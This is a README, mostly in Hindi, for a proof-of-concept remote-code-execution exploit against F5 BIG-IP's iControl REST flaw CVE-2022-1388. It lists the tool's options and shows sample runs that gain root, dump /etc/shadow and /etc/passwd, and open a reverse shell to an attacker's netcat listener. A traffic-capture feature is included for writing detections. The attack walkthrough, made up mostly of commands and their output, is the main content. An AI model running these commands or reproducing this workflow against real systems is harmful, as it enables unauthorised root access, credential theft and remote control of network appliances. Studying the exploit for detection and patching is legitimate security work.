
-- केवल शैक्षिक उपयोग के लिए -- CVE-2022-1388 के लिए प्रूफ-ऑफ-कॉन्सेप्ट RCE, साथ ही नीली और लाल टीमों के लिए कुछ अतिरिक्त कार्यक्षमता
लेखक इस प्रोजेक्ट/रिपॉजिटरी के किसी भी पहलू से किए गए किसी भी कार्य के लिए जिम्मेदार या उत्तरदायी नहीं है। मैंने इसे हमले को समझने और SIEM के भीतर डिटेक्शन लिखने के उद्देश्य से बनाया है और दूसरों को भी ऐसा करने के लिए साझा करना चाहता था। अपने जोखिम पर उपयोग करें।
यह एक्सप्लॉइट F5 सिस्टम्स में BIG-IP iControl REST भेद्यता CVE-2022-1388 को लक्षित करता है। कृपया प्रभावित संस्करणों और अन्य जानकारी के लिए F5 सलाहकार (https://support.f5.com/csp/article/K23605346) देखें।
बेझिझक PR करें या कोई समस्या रिपोर्ट करें। इसका परीक्षण CentOS मशीन से Python 3.6 के साथ Google Cloud में कुछ कमजोर F5 VE पर किया गया था।
CVE-2022-1388.py [-h] -t TARGET -p PORT [-c CMD] [-s] [-e] [-lh LHOST] [-lp LPORT]
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET, --RHOSTS TARGET
Target IP of vulnerable BIG-IP system
-p PORT, --port PORT, --RPORT PORT
Target port on vulnerable BIG-IP system
-c CMD, --cmd CMD, --command CMD
Command to run on target system
-e, --export, --tcpdump
Export captured traffic and ssl-key.log | **Requires sudo privileges!
-q, --quiet Don't display banner
-s, --shell Launch an interactive shell
-lh LHOST, --lhost LHOST, --LHOST LHOST
Required for -s [shell]; Local IP/interface to bind listener to
-lp LPORT, --lport LPORT, --LPORT LPORT
Required for -s [shell]; Local port to bind listener to
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c id
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
===============================================================================================================
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/shadow" -q
root:!!:18656:0:99999:7:::
bin:*:16479:0:99999:7:::
daemon:*:16479:0:99999:7:::
adm:*:16479:0:99999:7:::
lp:*:16479:0:99999:7:::
mail:*:16479:0:99999:7:::
uucp:*:16479:0:99999:7:::
[[ removed for brevity ]]
Attacker:
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -s -lh 10.142.0.8 -lp 4444
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
===============================================================================================================
[+] If you haven't already, please start your listener of choice on port 4444
[+] Press any key to continue...
[+] Exploit finished. If you launched a reverse shell listener, check there for your terminal!
Listener:
$ nc -lp 4444
bash: no job control in this shell
[@localhost:Active:Standalone] restjavad # whoami
whoami
root
-e (--export) फ्लैग निर्दिष्ट करने से दो फ़ाइलें बनेंगी: detection.pcap और ssl-key.log। हर बार -e फ्लैग निर्दिष्ट करने पर ये फ़ाइलें ओवरराइट हो जाएंगी, इसलिए उन फ़ाइलों को स्थानांतरित या नाम बदलना याद रखें जिन्हें आप रखना चाहते हैं। ssl-key.log को Wireshark में Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log filename के माध्यम से आयात किया जा सकता है ताकि TLS सत्र को डिक्रिप्ट किया जा सके। ध्यान दें कि tcpdump के कारण, -e का उपयोग करते समय, स्क्रिप्ट को sudo के रूप में चलाया जाना चाहिए।
$ sudo python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/passwd" -q -e
[+] Starting tcpdump on port 8443 for 5 seconds
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
[[ removed for brevity ]]
TLS डिक्रिप्शन से पहले:

स्वचालित रूप से निर्यात किए गए ssl-key.log को Wireshark में TLS प्राथमिकताओं में जोड़ना:

TLS डिक्रिप्शन के बाद:

